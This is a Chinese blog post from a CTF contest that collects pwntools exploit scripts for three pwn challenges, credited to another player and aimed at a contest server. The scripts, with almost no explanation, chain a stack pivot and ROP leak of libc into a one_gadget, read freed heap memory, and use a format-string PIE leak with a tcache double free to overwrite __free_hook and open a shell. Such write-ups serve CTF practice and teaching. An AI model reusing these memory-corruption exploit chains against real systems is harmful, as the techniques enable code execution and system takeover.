i春秋新春赛pwn脚本

Pwn

Word count: 773Reading time: 4 min

 2020/02/24   Share

exp来自大哥诺夜

borrowstack

from pwn import *
#p = process("./borrowstack")
p = remote("123.56.85.29",3635)

p.send("a"*0x60+p64(0x601080+0x100-0x60)+p64(0x400699))

vsyscall = 0xffffffffff600000
puts_plt = 0x4004E0
puts_got = 0x601018
pop_rdi = 0x0000000000400703
pop_rsi_r15= 0x0000000000400701
vuln = 0x400680
read_plt = 0x0400500
ret = 0x40069A
pop_rbx_=0
one = [0x45216,0x4526a,0xf02a4,0xf1147]

payload = ''
payload = payload.ljust(0x100-0x58,'\x00')
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)

payload += p64(pop_rsi_r15)
payload += p64(0x601180)
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(read_plt)
payload += p64(ret)
payload += p64(ret)
p.send(payload)
p.recvuntil('now!\n')


libc = u64(p.recv(6)+'\0\0')-0x6F690
print hex(libc)



payload = ''
payload += p64(libc+one[1])

#gdb.attach(p,'b *0x40068F')
p.sendline(payload)
p.interactive()

excited

from pwn import *
#p = process("./excited")
context.log_level = 'debug'
p = remote("123.56.85.29",6484)
def add(size1,data1,size2,data2):
	p.recvuntil("do :")
	p.sendline("1")
	p.recvuntil("length : ")
	p.sendline(str(size1))
	p.recvuntil("ba : ")
	p.sendline(data1)
	p.recvuntil("length : ")
	p.sendline(str(size2))
	p.recvuntil("na : ")
	p.sendline(data2)
def free(index):
	p.recvuntil("do :")
	p.sendline("3")
	p.recvuntil("ID : ")
	p.sendline(str(index))
def show(index):
	p.recvuntil("do :")
	p.sendline("4")
	p.recvuntil("ID : ")
	p.sendline(str(index))
add(0x10,'a',0x20,'b')#0
add(0x20,'a',0x20,'b')#1
add(0x20,'a',0x20,'b')#2
free(0)
free(1)
add(0x10,p64(0x6020A8)+p64(0x6020A8),0x20,'b')#3
show(0)
#gdb.attach(p)
p.interactive()

interested

from pwn import *
#p = process("./interested")
p = remote("123.56.85.29","3041")
context.log_level = 'debug'
p.recvuntil("Input your code please:")
#libc = ELF("interested").libc  #它的脚本是这句，但是在我虚拟机上跑不出来，说是libc版本的问题，后面他发给我一个给我，改成下面的语句
libc=ELF("libc.so.6")
p.sendline("OreOOrereOOreO\n%6$p")
p.sendline("0")
p.recvuntil("OreOOrereOOreO\n0x")
pie = int(p.recv(12),16) - 0x9e0

def add(o_size,o_data,re_size,re_data):
	p.recvuntil("do :")
	p.sendline('1')
	p.recvuntil("length : ")
	p.sendline(str(o_size))
	p.recvuntil(": ")
	p.sendline(o_data)
	p.recvuntil("length : ")
	p.sendline(str(re_size))
	p.recvuntil(": ")
	p.sendline(re_data)
def edit(index,o_data,re_data):
	p.recvuntil("do :")
	p.sendline('2')
	p.recvuntil("ID : ")
	p.sendline(str(index))
	p.recvuntil(": ")
	p.sendline(o_data)
	p.recvuntil(": ")
	p.sendline(re_data)
def free(index):
	p.recvuntil("do :")
	p.sendline('3')
	p.recvuntil("ID : ")
	p.sendline(str(index))
def show(index):
	p.recvuntil("do :")
	p.sendline('4')
	p.recvuntil("ID : ")
	p.sendline(str(index))



one = [0x45216,0x4526a,0xf02a4,0xf1147]
add(0x50,'a',0x50,'a')#1
add(0x70,'a',0x70,'a')#2
add(0x50,'a',0x70,p64(0)+p64(0x81))#3
add(0x70,'a',0x70,'a')#4
free(2)
free(2)
show(2)
p.recvuntil("oreo's O is ")
heap = u64(p.recv(6)+'\0\0')-0x180
print hex(heap)


edit(2,'aaa',p64(heap+0x270))
add(0x70,'a',0x70,'a')#5
edit(3,'aaa',p64(0)+p64(0xf1))
free(5)
edit(3,'aaa','a'*0x10)
show(3)
p.recvuntil("a"*0x10)
libc.address = u64(p.recv(6)+'\0\0')-0x3C4B0A
print hex(libc.address)

edit(3,'aaa',p64(0)+p64(0xf1)+p64(libc.address+0x3C4B78)+p64(libc.address+0x3C4B78))


add(0x61,'a',0x70,'a')#6
free(1)
edit(1,'a',p64(pie+0x202168))
add(0x50,'a',0x50,p64(0x90)*0x6+p64(pie+0x202010))#7
edit(1,'a',p64(0))
edit(7,'a',p64(0x90)*0x6+p64(libc.sym['__free_hook']))
edit(1,'a',p64(libc.address+one[1]))
free(1)
#add(0x50,'a',0x50,p64(0x90)*0x6+p64(libc.sym['__malloc_hook']))#7
#gdb.attach(p)
p.interactive()

Author：DGZ

原文链接：https://dgz-cyber.github.io/2020/02/24/i%E6%98%A5%E7%A7%8B%E6%96%B0%E6%98%A5%E8%B5%9Bpwn%E8%84%9A%E6%9C%AC/

发表日期：February 24th 2020, 11:55:34 am

更新日期：February 24th 2020, 11:58:06 am

Next Post

CBC翻转攻击及Padding Oracle Attack(POA)的记录
Previous Post

i春秋新春赛Crypto记录

CATALOG

1. borrowstack
2. excited
3. interested

